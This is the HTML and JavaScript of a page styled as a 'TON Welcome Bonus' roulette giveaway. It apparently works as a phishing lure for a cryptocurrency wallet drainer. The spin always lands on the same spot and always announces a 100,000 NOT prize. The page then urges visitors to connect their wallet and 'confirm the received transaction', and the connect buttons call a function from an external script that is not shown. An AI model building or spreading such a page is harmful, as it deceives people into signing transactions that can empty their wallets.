<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TON Welcome Bonus</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <script src="./clean_script.js"></script>
    <style>
        body {
            overflow: hidden;
        }

        .roulette-wrapper {
            position: relative;
            display: flex;
            justify-content: center;
            width: 100%;
            margin: 0 auto;
            overflow: hidden;
        }

        .roulette-wrapper .selector {
            width: 3px;
            background: grey;
            left: 50%;
            height: 100%;
            transform: translate(-50%, 0%);
            position: absolute;
            z-index: 2;
        }

        .roulette-wrapper .wheel {
            display: flex;
        }

        .roulette-wrapper .wheel .row {
            display: flex;
        }

        .roulette-wrapper .wheel .row .card {
            height: 75px;
            width: 150px;
            margin: 3px;
            border-radius: 8px;
            border-bottom: 3px solid rgba(0, 0, 0, 0.2);
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-size: 1.5em;
        }

        .card.odd {
            background: #2563eb;
        }

        .card.even {
            background: #1e3a8a;
        }

        * {
            box-sizing: border-box;
        }

        #modalOverlay {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background-color: rgba(0,0,0,0.4);
            z-index:9999;
        }

        #modal {
            position: fixed;
            width: 90%;
            top: 55%;
            left: 50%;
            text-align: center;
            box-sizing: border-box;
            opacity: 0;
            transform: translate(-50%,-50%);
            transition: all 300ms ease-in-out;
        }

        #modalOverlay.modal-open #modal {
            opacity: 1;
            top: 50%;
        }

    </style>
</head>
<body class="bg-gray-900 text-white">
<!-- Main container -->
<div class="min-h-screen flex flex-col items-center justify-center">
    <!-- Header section -->
    <header class="text-center m-5 mb-8">
        <div class="flex justify-between items-center">
            <!-- TON Logo -->
            <div class="text-white font-bold text-lg">TON</div>
            <!-- Connect Wallet Button -->
            <button id="connect-wallet" class="connect-wallet bg-blue-500 px-4 py-2 rounded-full text-white font-bold">Connect Wallet
            </button>
        </div>

        <!-- Welcome Bonus Section -->
        <h1 class="mt-8 text-3xl font-bold">
            WELCOME <span class="text-blue-500">BONUS</span> FOR TON USERS
        </h1>
    </header>

    <!-- Spin Wheel Section -->
    <div class="relative flex flex-col items-center justify-center mt-10">
        <div class='roulette-wrapper'>
            <div class='selector'></div>
            <div class='wheel'></div>
        </div>

        <div>
            <button id="spin-button" class="bg-blue-500 px-4 py-2 rounded-full text-white font-bold mt-10">
                FREE SPIN
            </button>
        </div>
    </div>

    <!-- Instructions Section -->
    <div class="m-5 mt-10 text-left bg-gray-800 p-6 rounded-lg space-y-4">
        <p><span class="font-bold text-blue-500">1.</span> If you have received a qualification notification in the form
            of NFT or USDT, click the button <strong>«FREE SPIN»</strong>.</p>
        <p><span class="font-bold text-blue-500">2.</span> If you win a reward in the free spin, we congratulate you!
        </p>
        <p><span class="font-bold text-blue-500">3.</span> Click <strong>«CLAIM REWARD»</strong>, connect your wallet
            and confirm the received transaction.</p>
    </div>

    <!-- Footer Section -->
    <footer class="mt-10 text-center text-gray-400 text-sm">
        Copyright © 2024 TON. All Rights Reserved
    </footer>
</div>

<div id="modalOverlay" style="display:none;">
    <div id="modal" class="bg-gray-800 shadow-lg rounded-2xl max-w-96">
        <div class="bg-gray-800 rounded-2xl p-12 border-2 border-gray-800">
            <button id="close" class="m-4 absolute top-0 right-1 hover:bg-gray-200 rounded-full p-1 focus:outline-none focus:ring-2 focus:ring-offset-0 focus:ring-black" type="button">
                <svg xmlns="http://www.w3.org/2000/svg" class="h-7 w-7" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                    <path stroke-linecap="round" stroke-linejoin="round" d="M6 18L18 6M6 6l12 12" />
                </svg>
            </button>
            <div class="flex flex-col gap-6 text-white text-xl items-center justify-center">
                <div>
                    <h3 class="text-2xl mb-8">Congratulations!<br />You won 100.000 NOT</h3>
                    <p class="text-sm">You need connect your wallet to get reward</p>
                </div>
                <div class="flex flex-col justify-between items-center">
                    <!-- Connect Wallet Button -->
                    <button id="connect-wallet1" class="connect-wallet bg-blue-500 px-4 py-2 rounded-full text-white font-bold">Connect Wallet
                    </button>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Script to handle spinning animation -->
<script type="text/javascript">
    const generateOutcome = () => {
        return 1000;
    }

    $(document).ready(function () {
        // $('#model-panel').hide().css({
        //     'display': 'none'
        // });
        //
        // $('#model-wrapper').hide().css({
        //     'display': 'none'
        // });
        //setup multiple rows of colours, can also add and remove while spinning but overall this is easier.
        initWheel();

        const closeModal = () => {
            const modal = $('#modalOverlay');
            modal.removeClass('modal-open');
            setTimeout(function() {
                modal.hide();
            },200);
        }

        const isModalOpen = () => $('#modalOverlay').hasClass('modal-open')

        $('#spin-button').on('click', function (e) {
            spinWheel(generateOutcome());
            e.stopPropagation()
        });

        $('.connect-wallet').on('click', function (e) {
            if (isModalOpen()) {
                closeModal();
            }
            setTimeout(connectWallet, 200);
        })

        $('#close').click(closeModal);


        function initWheel() {
            let $wheel = $('.roulette-wrapper .wheel'),
                row = "";

            row += "<div class='row'>";
            row += "  <div class='card odd'>100,000 NOT<\/div>";
            row += "  <div class='card even'>100 TON<\/div>";
            row += "  <div class='card odd'>70 TON<\/div>";
            row += "  <div class='card even'>No reward<\/div>";
            row += "  <div class='card odd'>Random NFT<\/div>";
            row += "  <div class='card even'>10.000 NOT<\/div>";
            row += "  <div class='card odd'>100 TON<\/div>";
            row += "  <div class='card even'>50 TON<\/div>";
            row += "  <div class='card odd'>5 TON<\/div>";
            row += "  <div class='card even'>10 TON<\/div>";
            row += "  <div class='card odd'>5 TON<\/div>";
            row += "  <div class='card even'>10 TON<\/div>";
            row += "<\/div>";

            for (let x = 0; x < 75; x++) {
                $wheel.append(row);
            }
        }

        function spinWheel() {
            let $wheel = $('.roulette-wrapper .wheel'),
                position = 7;

            //determine position where to land
            let rows = 12,
                card = 150 + 3 * 2,
                landingPosition = (rows * 15 * card) + (position * card);

            let randomize = Math.floor(Math.random() * 150) - (150);

            landingPosition = landingPosition + randomize;

            let object = {
                x: Math.floor(Math.random() * 50) / 100,
                y: Math.floor(Math.random() * 20) / 100
            };

            $wheel.css({
                'transition-timing-function': 'cubic-bezier(0,' + object.x + ',' + object.y + ',1)',
                'transition-duration': '6s',
                'transform': 'translate3d(-' + landingPosition + 'px, 0px, 0px)'
            });

            setTimeout(function () {
                $wheel.css({
                    'transition-timing-function': '',
                    'transition-duration': '',
                });

                $('#modalOverlay').show().addClass('modal-open');
            }, 6000);
        }
    });
</script>
</body>
</html>
